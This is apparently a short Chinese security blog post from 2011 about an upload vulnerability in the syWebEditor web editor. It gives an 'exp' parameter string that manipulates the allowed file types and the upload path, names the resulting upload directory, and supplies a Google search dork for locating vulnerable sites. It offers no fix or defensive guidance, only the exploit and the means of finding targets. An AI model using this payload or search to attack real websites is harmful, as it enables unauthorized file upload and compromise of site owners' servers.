渗透
oma
全部博文(181)
phpcms(2)
linux(4)
2011年(40)
2010年(17)
2009年(87)
2008年(37)
a7897897
HazeC
haille
呆瓜路
coldgin
小房_1
qscf_520
yejing33
luwenju
分类: 网络与安全
2011-04-06 21:46:21
syWebEditor编辑器存在上传漏洞,也是解析的问题,跟其它出现这漏洞的
编辑器一样。
exp:
%7Cjpg%7Cpng%7C&filePathType=1&filePath=/PhotoFile/ProFile/
上传后的目录/PhotoFile/ProFile/。有个自动改名的选项。
谷歌一下:inurl:syWebEditor
上一篇:spidaNews V.1.0 注入漏洞及修复(news.php)
下一篇:WordPress自定义页面插件远程包含漏洞
登录 注册